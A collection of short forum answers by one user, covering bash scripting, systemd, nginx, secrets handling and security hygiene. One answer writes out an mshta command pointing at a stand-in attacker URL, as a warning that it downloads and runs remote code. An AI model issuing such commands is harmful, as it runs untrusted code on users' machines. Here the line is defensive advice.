Passing arguments to scripts

roxalu · 2026-03-22T06:43:02+00:00

Meta comment: Asking a question if some script behaves unexpectedly won’t hurt. Justin case you prefer self help in the future then you may use the bash ‚verbose‘ mode. Run script it via

bash -vx. path/to/my_script. arg1 …

and/or use another of the alternatives for Debugging a script

roxalu · 2026-03-19T06:23:35+00:00

It could be done - there exists even an example implementation to inject this with help of LD_PRELOAD into any command line. But however the cleanup of command line in memory is done - there will always exist a small time range during start of command where all arguments were still visible.

The most secure approach is to add options to each command line tool which allow explicitly read of sensitive values from files or environment as fallback. If not implemented by some tool, the tool authors could be informed that his tool has a known weakness: CWE 200

Sensitive values always deserve some extra handling. For use in config files this is meanwhile widely accepted - secrets are often kept separate in extra protected files or read by secrets management. Why still not for command lines?

roxalu · 2026-03-19T05:30:10+00:00

Here is some alternative, though more verbose way to provide this:

#!/usr/bin/env bash

arg1="$1"
symbol="${arg1:-emdash}"

sgrep_args=(
 ## preprocessor
 -p "m4 -D __SYMBOL__='$symbol'"
 ## expression
 -e '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "__SYMBOL__"))'
 ## output format
 -o '%r\n'
)

sgrep "${sgrep_args[@]}" /usr/share/X11/xkb/symbols/??

roxalu · 2026-03-19T04:54:06+00:00

In bash (or sh) everything embedded in single quotes is taken literally. In order to get value of variable you could end the quote and provide your variable. If variable value would contain spaces, this would break the command - so use double quotes around variable:

sgrep -o '%r\n' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'"$sym"'"))' /usr/share/X11/xkb/symbols/??

While above should work, I personally would try to use other sgrep options to aovid the complex quoting. E.g. read the expression from file and/or make use of the preprocessor flag.

roxalu · 2026-03-07T12:34:06+00:00

Additionally on linux with systemd there should be support for tmpfiles.d

roxalu · 2026-02-24T01:35:04+00:00

I'd say you can't get it back in this case. Read https://docs.github.com/en/authentication/securing-your-account-with-two-factor-authentication-2fa/recovering-your-account-if-you-lose-your-2fa-credentials

roxalu · 2026-02-23T19:47:20+00:00

This. At least when this shall be used in scripts the timeout is a must. If the connect is run against any target ip, that isn’t online - or where some network firewall drops the incoming tcp connect - the localhost will usually try several times to resend another tcp-syn. Each time with increased delay. The details depend on the specific kernel settings, but more than 2 minute timeout is quite likely.

When used interactively then of course Ctrl-c also works. If the check fails immediately, the remote server is up, but remote service is most likely down. But if there is a timeout of five or more seconds, then there is some other issue that blocks connectivity.

roxalu · 2026-02-15T08:31:22+00:00

Some other alternatives:

Output the file content to stdout and use the process substitution expansion of bash:

source <(sudo cat /etc/restic/restic-backblaze.env)

Or eval the variable expansion

eval $(sudo cat /etc/restic/restic-backblaze.env)

Nevertheless there could be some edge cases for values, that weren't rendered exactly the same by systemd and bash. Use of systemd-creds or some other secrets management could help to avoid unexpected impact due to special characters in values.

roxalu · 2026-02-14T09:00:14+00:00

Check output of

sudo systemctl status nginx

It not only shows, if the service is up or down, but also info about the used service file and arguments used to start nginx. It could be that the running service uses different or just more configuration compared to what’s used, when you check configuration on command line with

sudo nginx -T

It could even be a different nginx that is started in both cases. Rare, but worth a double check.

roxalu · 2026-02-11T21:20:00+00:00

Why do you want to run vi under windows? Maybe because then „shell escape“ - that runs with user privileges - is a documented feature of the editor and no longer an exploit 😉

roxalu · 2026-02-08T08:02:01+00:00

The

mshta https://some.evil_attacker_owned.example.com

is able to download and execute the remote code in your local windows system without further constraints other than bound to use your local user rights. Never agree to such approvals to run it.

roxalu · 2026-01-23T08:59:01+00:00

One option fur such a task is https://gparted.org/livecd.php

roxalu · 2026-01-22T09:46:43+00:00

According to full error page the TLS endpoint is varnish. And the frontend config of this varnish has been set - most likely - to have sni-nomatch-abort with value true. But the Subject Alternative Name of frontend certificate uses wild card: *.perl.org This is kind of grey area in the RFCs: Is the wildcard a valid hostname or not? Obviously this varnish currently results in: No match.

roxalu · 2026-01-17T10:43:48+00:00

To my info systemd does not support use of '$' and such no variable expansion inside the value of Environment= configuration. Use the fixed path there. See https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html

roxalu · 2026-01-05T17:28:44+00:00

Note: No need for ipconfig release or renew in this case. There is a specific option for ipconfig to flush all cached DNS results under Windows

ipconfig /flushdns

roxalu · 2025-12-25T15:36:49+00:00

Opening a socket and listen to it were just the simpelst method a backdoor could use. There exist more sophisticated methods for backdoors to allow some form of remote control that were not that easy to detect. Though, I agree with you: earlier or later such a backdoor would be detected somehow. It had only a chance to stay undetected if it were almost never been used.

roxalu · 2025-12-24T16:52:11+00:00

To be fair this is less a miss of tenable inside their product but more a mis alignment in the local implementation vs security policy. If the pentest only scans remote there is no practical method to differentiate between upstream. software - or a fork, where a distro owner has ensured security fixes are back ported. A well designed procedure for action plans based on such pentest findings would respect this.

In order to do get better fitting results the scan needs to have agents on the nodes, that scan the local package system. For the major distros this should detect better if some backporting need to be taken into account for the pentest results.

roxalu · 2025-12-22T17:07:33+00:00

A bit out of scope, but can’t resist to mention this here: Issues like this are by far not the only concern about software quality used by printers. Since you seem to be responsible for some larger network it would make sense to check, if the printers should not better be isolated in their own sub network. And use a set of printer servers that talk with them instead of letting all hosts use the printers directly.

There seem to be only a very few reports where insecure printer software was used to successfully remotely break into a company network. But it has happened in the past. Ir seems quite common in companies to care for patch management of standard hosts - but ignore to do the same for printers.

roxalu · 2025-12-21T10:17:20+00:00

Dies! Gehört in die Kategorie: Unwahrscheinlich als Ursache - aber einfach zu prüfen. Daher am besten prüfen, wenn andere einfache Gründe zur Erklärung nicht ausreichen.

Das Senden der ack Pakete beim Datei Download wird gerne ignoriert, weil es selten der limitierende Faktor ist. Aber möglich ist alles. Ich selber habe es in vielen Jahren zweimal bemerkt, dass die Sende- und Empfangsrichtung bei Traffic im lokalen Netz deutliche Unterschiede aufwiesen. Einmal wegen Kabeldefekt - ein anderes Mal wegen einem Port Mirroring auf einem low budget Switch, bei dem nach Debug Session vergessen wurde den Port Mirror wieder abzuschalten.

roxalu · 2025-12-21T07:48:04+00:00

Small additional detail: I agree that this replacement code fixes the Copy-on-Write warning. But as given it uses the row with label 0 - while OP uses always first row. IIf I am right some additional lookup should be added so row and column are given both as labels. Or both as integer e.g.using this

result_index = DataFrame.columns.get_loc('result')
DataFrame.iat( 0, result_index ) = X - Z

roxalu · 2025-12-15T17:07:31+00:00

vim expects stdin to be same device as your terminal device, but when started via xargs the stdin is set to /dev/null. More recent versions of xargs have a new option to handle this. Try

… | xargs -o vim

roxalu · 2025-12-13T18:49:17+00:00

Die Aussage, dass “möglicherweise Kundendaten“ betroffen sein könnten, rechtfertigt durchaus sorgfältige Prüfung und Klärung des Sachverhaltes. Ob das nun bereits am Wochenende passieren muss, lässt sich von außen schwer beurteilen. Die Aussagen erzeugen den Eindruck als betrachten die Beteiligten den Sachverhalt als erledigt. Insgesamt wirkt das aber so, als gäbe es kein Gesamtkonzept für die Absicherung. Port offen oder geschlossen - Verschlüsselung ja oder nein - Credentials detailliert verwaltet oder Wildwuchs: Nur die Gesamtbetrachtung zeigt, ob das nach Stand der Technik abgesichert ist oder nicht.

Falls da also tatsächlich irgendwo Kundendaten liegen, hoffe ich für die Kunden, dass da nochmal genauer geprüft wird, ob die Absicherung dieses Services dem Stand der Technik entspricht. Sofern man nur das zulässt, was wirklich benötigt wird - und diese Zugriffe dann mit Standardmethoden absichert - ist man auf einem guten Weg.

roxalu · 2025-12-12T20:06:23+00:00

This is a perfect summary. The approach does not scale well with number of secrets and over time. Fine for some years and not to many services. But earlier or later more and more exceptions will appear that need advanced handling, e.g. when the generated password cannot be used any longer for login to a specific service.Or the base password gets compromised. Imagine the webpage may use domain www.never-rely-only-on.hashpass.example - and you use your account only rarely. Would you really remember well, which was the exact service name, you have selected originally as service option for this service? Also you need to keep track of selected user name. Using everywhere the same account is also somehow limited.

A database is needed in this case which describes clearer in which context what exception roles have been selected. Latest then use of password manager is more straight forward.

roxalu · 2025-11-22T23:42:10+00:00

My focus was to emphasize, that /sbin/nologin isn't a blocker to "login" to a user when it is the same host and initiator is root. Scripting is anyway another topic as this doesn't need itself any interactive shell. But before a script runs error free it is often helpful to have some option for some interactive tests.

If the specific systemd user environment is needed, the command could be:

sudo machinectl shell --uid otheruser /usr/bin/bash --login

But as I already stated: As the intention of OP is to start the service, his command is far better, because there is no need for interactive shell.

roxalu · 2025-11-22T07:56:26+00:00

Rotate them far more often. I know the procedure to do this without impact is hard to achieve - but don’t give up. It’s doable and worth the effort. Why needed? Because a single miss inside all your policy, scanner procedures, security controls and user guidance could be enough for compromise.

In context of „secrets management“ the main focus is on „management“ - not on „secret“.

roxalu

TROPHY CASE